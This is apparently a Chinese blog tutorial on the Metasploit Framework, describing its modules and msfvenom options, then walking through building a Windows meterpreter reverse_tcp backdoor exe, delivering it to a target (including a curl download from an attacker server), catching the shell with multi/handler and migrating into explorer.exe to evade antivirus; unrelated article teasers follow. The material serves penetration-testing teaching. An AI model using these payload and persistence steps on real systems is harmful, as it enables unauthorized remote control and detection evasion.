Metasploit Framework(MSF)从入门到实战(二)

Metasploit Framework(MSF)从入门到实战(一)_安装msf更新-CSDN博客

MSF模块介绍

MSF有7个模块,分别对下面目录下的7个子文件夹:

auxiliary(辅助模块 )

show auxiliary //查看所有辅助模块

负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能的辅助模块

exploits(渗透攻击模块)

show exploits

利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动)

payloads(攻击载荷模块)

成功exploit之后,真正在目标系统执行的代码或指令。

分为3种类型的payload,分别是single、stages和stagers。

  • single:all-in-one。完整的payload,这些payload都是一体化的,不需要依赖外部的库和包。

  • stagers:目标计算机内存有限时,先传输一个较小的payload用于建立连接

  • stages:利用stagers建立的连接下载后续payload。

encoders(编码器模块)

对payload进行加密,躲避Anti Virus检查的模块

nops(空指令模块)

提高payload稳定性及维持大小。在渗透攻击构造恶意数据缓冲区时,常常要在真正要执行的Shellcode 之前添加一段空指令区, 这样当触发渗透攻击后跳转执行Shellcode时,有一个较大的安全着陆区,从 而避免受到内存地址随机化、返回地址计算偏差等原因造成的Shellcode执行失败,提高渗透攻击的可靠 性。

post (后渗透攻击模块)

在取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、跳板 攻击等操作

evasion (免杀模块)

metasploit升级到5.0,引入了一个新的模块,用于免杀绕过

MSF生成木马(反向shell)

msfvenom介绍

msfvenom — Metasploit 独立有效负载生成器,是用来生成后门的软件,在目标机上执行后门上线。

参数介绍

  • -l, --list <type> 列出 [type] 的所有模块。类型有:payloads、encoders、 nops、platforms、archs、encrypt、formats、all

  • -p, --payload <payload> 要使用的有效负载(--list 要列出的有效负载,--listoptions 用于参数)。为自定义指定“-”或 STDIN

  • --list-options 列出 --payload <value> 的标准、高级和规避选项

  • -f, --format <format> 输出格式(使用 --list 格式列出)

  • -e, --encoder <encoder> 要使用的编码器(使用 --list 编码器列出)

  • --service-name <value> 生成服务二进制文件时使用的服务名称

  • --sec-name <value> 生成大型 Windows 二进制文件时使用的新部分名称。默认值: 随机 4 个字符的字母字符串

  • --smallest 使用所有可用的编码器生成尽可能小的有效载荷

  • --encrypt <value> 应用于 shellcode 的加密或编码类型(使用 --list encrypt 列出)

  • --encrypt-key <value> 用于 --encrypt 的密钥

  • --encrypt-iv <value> --encrypt 的初始化向量

  • -a, --arch <arch> 用于 --payload 和 --encoders 的架构(使用 --list archs 列出)

  • --platform <platform> --payload 的平台(使用 --list 平台列出)

  • -o, --out <path> 将有效负载保存到文件

  • -b, --bad-chars <list> 避免使用的字符示例:'\x00\xff'

  • -n, --nopsled <length> 将 [length] 大小的 nopsled 添加到有效负载上

  • --pad-nops 使用 -n <length> 指定的 nopsled 大小作为总负载大小, 自动预先添加数量的 nopsled(nops 减去负载长度)

  • -s, --space <length> 结果有效载荷的最大大小

  • --encoder-space <length> 编码负载的最大大小(默认为 -s 值)

  • -i, --iterations <count> 设置有效载荷的编码次数

  • -c, --add-code <path> 指定要包含的附加 win32 shellcode 文件

  • -x, --template <path> 指定用作模板的自定义可执行文件

  • -k, --keep 保留 --template 行为并将有效负载作为新线程注入

  • -v, --var-name <value> 指定用于某些输出格式的自定义变量名称

  • -t, --timeout <second> 从 STDIN 读取有效负载时等待的秒数(默认为 30,0 表示禁 用)

  • -h, --help 显示此消

列出全部的payload

msfvenom -l payloads

MSF永痕之蓝实战

【精选】详尽的msf——meterpreter——渗透测试教程-CSDN博客

制作属于自己的exe后门程序

Meterpreter命令详解

reverse_tcp

这是一个基于TCP的反向链接反弹shell, 使用起来很稳定

我们将使用payload——windows/x64/meterpreter/reverse_tcp

查看payload有哪些选项,支持哪些平台

msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options

name:我们使用的paylaod的名字,类型

module:具体的模块

platform:目标系统

option:需要设定的参数,这里required-yes表示能更改参数

这里需要设置本机IP—LHOST

ifconig

获取到本机IP:192.168.97.60

生成后门文件

64位

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.226.210 LPORT=5555 -f exe > sl.exe

32位

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.208.134 LPORT=5555 -a x86 --platform Windows -f exe > shell1.exe

这里就多了一个shel.exe,就是我们的后门文件

这里注意一个点,如果在默认的位置上生成该文件的话,是在root文件夹里,可能会出现权限不够不能移动该文件,而这个文件需要在目标靶机上面运行才能达到我们的目的,所以在最初生成该文件的时候,建议换到desktop路径下生成

上传木马文件

  • 可以通过永恒之蓝获取到的权限去执行
  • 可以通过web漏洞获取到权限之后,用蚁剑上传到目标去执行
  • 如果无法上传,可以将木马上传到自己的web服务器上,在目标上去下载 windows 可以用的下载命令:
    • curl http://xxx.xxx.xxx.xxx/info.exe -O/-C
    • linux系统,wget

总之想办法让目标机器运行这个exe

msf监听

使用msf的监听模块 use exploit/multi/handler

先使用search指令查找需要用到的模块

然后

use 5

 

已经载入该exp,然后设置payload,并显示需要设置的参数

set payload windows/meterpreter/reverse_tcp 
show options

 

set lhost 10.20.58.96 # 设置为kali自己的IP
set lport 7777  #设置为刚刚创建可执行木马后门

 

msf上线

开始监听后,在目标机器上执行exe文件,获取目标权限

run

 

靶机运行了后门文件,即可获取权限

进入靶机的cmd只需要使用命令shell,退出cmd就用exit

这里涉及到命令行乱码,可以在shell模式下使用命令解决

chcp 65001#Chcp 65001的意思是改变当前活动代码页为UTF-8,让当前的批处理窗口支持UTF-8格式的文件

迁移进程

在上传木马之后,我们在进程里面可以查看到开启的进程,文件放在目标上如果对方杀软更新,很有可

能会检测出来,所以我们会将木马进程迁移到一个稳定的应用进程后,删除木马文件,如果不迁移,木

马文件将被占用无法删除

查看所有进程

查看meterpreter shell的进程号

找到explorer.exe进程pid为900

然后使用migrate 900命令将shell移到PID为900的explorer.exe进程里,因为该进程是一个稳定的应 用。

迁移完成之后,就可以删除我们上传的木马文件

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/603071.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Apache DolphinScheduler 4月简报:社区发展与技术革新速递

各位热爱 DolphinScheduler 的小伙伴们&#xff0c;4 月份的 DolphinScheduler 社区月报更新啦&#xff01;这里将记录 DolphinScheduler 社区每月的重要更新&#xff0c;欢迎关注&#xff01; 月度 Merge 之星 感谢以下小伙伴 4 月为 Apache DolphinScheduler 所做的精彩贡献…

【话题】如何看待AI技术,以及AI技术的发展现状和未来趋势

大家好&#xff0c;我是全栈小5&#xff0c;欢迎阅读小5的系列文章&#xff0c;这是《话题》系列文章 目录 背景一、引言二、AIGC技术的发展现状2.1、技术突破与成果2.2、应用领域的拓展2.3、市场规模的增长 三、AIGC技术的未来趋势3.1、技术融合与创新3.2、应用领域的深化3.3、…

【优选算法】——Leetcode——LCR 179. 查找总价格为目标值的两个商品

1.题目 2. 解法⼀&#xff08;暴⼒解法&#xff0c;会超时&#xff09;&#xff1a; 1.算法思路&#xff1a; 2.图解 3. 代码实现 3. 解法⼆&#xff08;双指针-对撞指针&#xff09;&#xff1a; 1.算法思路&#xff1a; 2.图解 3.代码实现 1.C语言 2…

【4089】基于小程序实现的互动打卡系统

作者主页&#xff1a;Java码库 主营内容&#xff1a;SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app等设计与开发。 收藏点赞不迷路 关注作者有好处 文末获取源码 技术选型 【后端】&#xff1a;Java 【框架】&#xff1a;spring…

数智结合,智慧合同让法务管理发挥内在价值

在当今这个信息化、数字化飞速发展的时代&#xff0c;数据已成为企业重要的战略资源。法务管理作为企业内部控制和风险防范的重要环节&#xff0c;其重要性不言而喻。然而&#xff0c;传统的法务管理模式往往存在效率低下、信息孤岛、反应迟缓等问题。在这样的背景下&#xff0…

【Ubuntu】Ubuntu删除文件夹和文件的命令

Ubuntu删除文件夹和文件的命令 rm -rf将文件夹下所有的内容都可以删除了

el-carousel走马灯页数回到第一页

我的走马灯是在一个弹窗里,包裹着一些button,切换到下一页时 关闭弹窗再打开弹窗还显示的是上次第二页位置 领导很不满意 1. 2.写在你打开弹窗或者关闭弹窗的位置 this.$refs.carousel && (this.$refs.carousel.activeIndex 0); 解释一下: this.$refs.carousel: thi…

电脑提示‘找不到msvcr110dll,无法继续执行代码’的解决方法,3分钟快速修复

不知道大家有没有遇到过这种情况&#xff0c;无端端电脑提示你找不到msvcr110dll,无法继续执行代码&#xff1f;当出现这个情况&#xff0c;证明你的某个程序就已经运行不了&#xff0c;你需要去修复这个错误&#xff0c;才能正常的运行程序&#xff0c;下面我们一起来详细的了…

纯血鸿蒙APP实战开发——Canvas实现模拟时钟案例

介绍 本示例介绍利用Canvas 和定时器实现模拟时钟场景&#xff0c;该案例多用于用户需要显示自定义模拟时钟的场景。 效果图预览 使用说明 无需任何操作&#xff0c;进入本案例页面后&#xff0c;所见即模拟时钟的展示。 实现思路 本例的的主要实现思路如下&#xff1a; …

Axure RP 9:卓越的交互式产品原型设计工具

Axure RP 9&#xff0c;作为一款备受欢迎的交互式产品原型设计工具&#xff0c;已经在全球范围内赢得了众多设计师和开发者的青睐。这款软件凭借其强大的功能和出色的用户体验&#xff0c;成为了产品原型设计领域的佼佼者。 Axure RP 9支持Mac和Windows两大操作系统&#xff0…

学会这些pytest-Allure常用特性allure.attach、allure.step、fixture、environment、categories

allure.attach allure.attach用于在测试报告中添加附件&#xff0c;补充测试结果。附件格式可以是txt、jpg等&#xff0c;附件内容通常是测试数据、截图等。 allure.attach提供了两种方法&#xff1a;allure.attach()&#xff0c;allure.attach.file() allure.attach() 作用…

flutter自定义日期选择器按日、按月、自定义开始、结束时间

导入包flutter_datetime_picker: 1.5.0 封装 import package:atui/jade/utils/JadeColors.dart; import package:flutter/cupertino.dart; import package:flutter/material.dart; import package:flutter_datetime_picker/flutter_datetime_picker.dart; import package:flut…

从开发角度理解漏洞成因(03)

文章目录 JS前端验证 - 文件上传设计浏览器禁用JS&#xff0c;前端绕过文件上传漏洞验证漏洞 Ajax 登录验证&#xff0c;状态回显&#xff0c;状态码设计修改返回包绕过登录验证 通过Ajax 传递数据进行购物验证设计1此漏洞也可以修改状态码绕过 持续更新中… 文章中代码资源已上…

运维自动化工具:Ansible 概念与模块详解

目录 前言 一、运维自动化工具有哪些 二、Ansible 概述 1、Ansible 概念 2、Ansible 特点 3、Ansible 工作流程 4、Ansible 架构 4.1 Ansible 组成 4.2 Ansible 命令执行来源 5、Ansible 的优缺点 三、Ansible 安装部署 1、环境部署 2、管理节点安装 Ansible 3、…

【如此简单!数据库入门系列】之无序不代表混乱 -- 堆文件

文章目录 前言堆文件链表实现页目录实现总结系列文章 前言 还记得上次遗留的问题吗&#xff1f; 以什么组织方式将数据保存在磁盘中&#xff1f; 今天我们接着讨论这个问题。 首先想一个问题&#xff1a;有一天&#xff0c;你开着自己心爱的大型SUV去超市购物。在停车场入口看…

roblox国际服游戏充值付款订阅Robux套装商城会员,roblox国际服虚拟信用卡充值教程

roblox是一款由Roblox公司开发的大型多人在线游戏创建平台&#xff0c;该平台允许用户设计自己的游戏、物品及衣服&#xff0c;以及游玩自己和其他开发者创建的各种不同类型的游戏。 没有账号注册一个账号&#xff0c;他支持多种平台授权登录&#xff0c;我这里直接选择注册一个…

2024蓝桥杯CTF writeUP--缺失的数据

压缩包的内容 里面有secret.txt文件&#xff0c;用ARCHPR工具套上字典&#xff0c;爆破压缩包密码。密码为pavilion 解压得到原图&#xff0c;并且有了加密后的图片&#xff0c;根据代码里的key和参数直接运行脚本解密水印图片&#xff1a; import cv2 import numpy as np imp…

qt5-入门-xml文件读写

本地环境&#xff1a; win10专业版&#xff0c;64位&#xff0c;Qt 5.12 代码已经测试通过。其他例子日后更新。 假设需要读写的xml文档结构如下图所示&#xff1a; 那么首先需要修改.pro文件&#xff0c;增加一句&#xff1a; 然后执行qmake。 代码 #include <QtXml/Q…

您的浏览器不支持 undefined 代理认证!如有问题请联系您的浏览器支持,请勿反馈此问题给 SwitchyOmega.

一、【问题描述】 PAC 文件是一个 JavaScript 文件&#xff0c;用于定义客户端的代理规则。您可以在 PAC 文件中编写规则&#xff0c;根据不同的目标网址或其他条件&#xff0c;决定是否通过代理服务器进行访问。您可以将 PAC 文件部署到服务器上&#xff0c;并在客户端配置浏…

一篇教程搞定Windows系统中的Docker应用安装

文章目录 1. 引言2. “Docker -> WSL -> Windows”的依赖逻辑3. 安装方法3.1 安装WSL3.2 安装Docker Desktop 4. 是否安装成功&#xff1f;初始化一个容器试试。FAQ 1. 引言 Docker是一个用于创建、管理和编排容器的应用。容器是运行在操作系统上的一个应用&#xff0c;…
最新文章